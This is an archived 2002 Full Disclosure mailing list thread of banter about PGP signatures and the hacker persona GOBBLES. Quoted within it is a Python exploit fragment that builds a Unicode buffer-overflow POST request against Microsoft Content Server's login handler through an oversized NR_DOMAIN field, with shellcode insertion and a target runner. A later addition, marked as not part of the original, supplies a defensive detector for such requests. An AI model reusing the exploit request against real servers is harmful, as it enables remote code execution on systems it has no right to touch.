Full Disclosure mailing list archives
ALERT! ALERT! Confessions of a turkey ALERT! ALERT! ;p;p;p;p;p;p;p
From: full-disclosure () lists netsys com (full-disclosure () lists netsys com)
Date: Wed, 14 Aug 2002 14:24:51 -0700
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

You supposed to be turkey friend turkey crew wanttobe yet you question show respect to turkey

On 14 Aug 2002 17:06:11 -0400, full-disclosure () lists netsys com wrote:
> At least you got the key id correct that time. It's not a valid
> signature, but at least it produces one less error message.
>
> -dave
>
> ObExploit:
>
> #fragment of my exploit for MS Content Server
> #the full exploit can be found at https://immunitysec.com/members/
> #but if you're not a member, this might save you some time writing your
> #exploit.
>
> #returns the sploitstring
> def makesploit(self):
>     header=""
>     body=""
>     body+="NR_DOMAIN=WinNT%3A%2F%2F"
>     #1 alignment byte so we are word aligned with the return addr
>     attack=""
>     attack+="A"
>     attack+="\x41\xb9"*4000
>     #unicode shellcode!!
>     attack=stroverwrite(attack,unicodeloop,1)
>     print "length of overflow = "+str(len(attack))
>     attack=urllib.quote(attack)
>     #print attack
>     body+=attack
>     body+="&NR_DOMAIN_LIST=WinNT%3A%2F%2FOAG4ZA0SR80BCRG&NR_USER=&NR_PASS WORD=&submit1=Continue&NEXTURL=%2FNR%2FSystem%2FAccess%2FDefaultGuest Login.asp"
>     header+="POST /NR/System/Access/ManualLoginSubmit.asp HTTP/1.1\r\n"
>     header+="Host: "+self.host+"\r\n"
>     header+="User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; Bob)\r\n"
>     header+="Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain ;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q =0.1\r\n"
>     header+="Connection: keep-alive\r\n"
>     header+="Content-Type: application/x-www-form-urlencoded\r\n"
>     header+="Content-Length: "+str(len(body))+"\r\n"
>     header+="\r\n"
>     return header+body
>
> #this stuff happens.
> if __name__ == '__main__':
>     print "Running Microsoft Content Server exploit v 0.1"
>     app = mscsexploit()
>     if len(sys.argv) < 2:
>         print "Usage: mycontent.py target [port] [ssl=0]"
>         sys.exit()
>     app.setHost(sys.argv[1])
>     if len(sys.argv) > 2:
>         app.setPort(int(sys.argv[2]))
>     if len(sys.argv) > 3:
>         app.setSSL(1)
>     app.run()
>
> On Wed, 2002-08-14 at 17:00, gobbles () hush com wrote:
>> -----BEGIN PGP SIGNED MESSAGE-----
>> Hash: SHA1
>>
>> or if you like
>>
>> On 14 Aug 2002 16:36:09 -0400, Dave Aitel <dave () immunitysec com> wrote:
>>> On Wed, 2002-08-14 at 17:04, Charles Stevenson wrote:
>>>> Gobbles,
>>>>
>>>> On Wed, Aug 14, 2002 at 12:33:27PM -0700, gobbles () hush com wrote:
>>>>> GOBBLES just want to be cool whitehat like everyone else. Time for
>>>>> new leaf time for six figure salary stock option naked breasted
>>>>> assistant.
>>>>
>>>> Word to that my man! ;)
>>>>
>>>> peace,
>>>> core
>>>
>>> Your message was signed, but the "GOBBLES" message was not and
>>> therefore just a forgery, most likely.
>>>
>>> BTW: http://www.immunitysec.com/vulnerabilities/
>>> They aren't advisories, but if you need something to show to your boss
>>> about why you disconnected your Exchange/SQL server from the Internet,
>>> it's a good start.
>>>
>>> Dave Aitel
>>> Immunity, Inc
>>
>> -----BEGIN PGP SIGNATURE-----
>> Version: Hush 2.1
>> Note: This signature can be verified at https://www.hushtools.com
>>
>> wlwEARECABwFAj1H8s4VHGdvYmJsZXNAaHVzaG1haWwuY29tAAoJEBzRp5chmbAPl8QA
>> nA66Z1OWuMnTnOhLlFQLa0nOHSZtAJsFKJo5AOe/7/OYbXpZRd3grAD8MQ==
>> =xfu0
>> -----END PGP SIGNATURE-----

-----BEGIN PGP SIGNATURE-----
Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com

wlgEARECABgFAj1ayx0RHGdvYmJsZXNAaHVzaC5jb20ACgkQpmwDHEAx56uBwgCgrzaw
9J7jHuxLlnnPRAQi7pVgx/8An2SfUM0vQPa0Qb1kbwD1FouFtcWi
=9eW6
-----END PGP SIGNATURE-----
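
Added example (not part of the original message, nor code from anyone in this thread): the quoted fragment sends an oversized NR_DOMAIN form field to /NR/System/Access/ManualLoginSubmit.asp, so a reverse proxy or capture pipeline can flag such requests by checking that field's decoded size and byte content. The 256-byte limit, the sample_request helper, the host name cms.example and the sample requests are assumptions constructed for illustration.

```python
from urllib.parse import parse_qs

# Path and field name are taken from the posted fragment.
LOGIN_PATH = "/NR/System/Access/ManualLoginSubmit.asp"
FIELD = "NR_DOMAIN"
MAX_FIELD_LEN = 256  # assumed limit; set it from your real domain names


def inspect_request(raw: bytes) -> list:
    """Return findings for one raw HTTP request; an empty list means clean."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line = head.split(b"\r\n", 1)[0].decode("latin-1")
    parts = request_line.split(" ")
    if len(parts) != 3:
        return ["malformed request line"]
    method, target, _version = parts
    path = target.split("?", 1)[0]
    if method != "POST" or path.lower() != LOGIN_PATH.lower():
        return []  # not the login handler, out of scope for this check
    # latin-1 maps bytes to code points 1:1, so decoded lengths are byte counts.
    fields = parse_qs(body.decode("latin-1"), keep_blank_values=True,
                      encoding="latin-1")
    findings = []
    for value in fields.get(FIELD, []):
        data = value.encode("latin-1")
        if len(data) > MAX_FIELD_LEN:
            findings.append(f"{FIELD} is {len(data)} bytes, limit {MAX_FIELD_LEN}")
        if any(b < 0x20 or b > 0x7E for b in data):
            findings.append(f"{FIELD} contains non-printable bytes")
    return findings


def sample_request(domain_value: str) -> bytes:
    """Build a constructed test request (not captured traffic)."""
    body = f"{FIELD}={domain_value}&NR_USER=&submit1=Continue".encode("ascii")
    head = (f"POST {LOGIN_PATH} HTTP/1.1\r\nHost: cms.example\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n"
            f"Content-Length: {len(body)}\r\n\r\n")
    return head.encode("ascii") + body


if __name__ == "__main__":
    for label, value in [("normal", "WinNT%3A%2F%2FCORP"),
                         ("oversize", "WinNT%3A%2F%2F" + "A" * 8000),
                         ("binary", "WinNT%3A%2F%2F%B9A")]:
        print(label, inspect_request(sample_request(value)))
```

The check needs the request body, which default web server access logs do not record, so it belongs in a proxy, WAF rule or packet-capture pipeline.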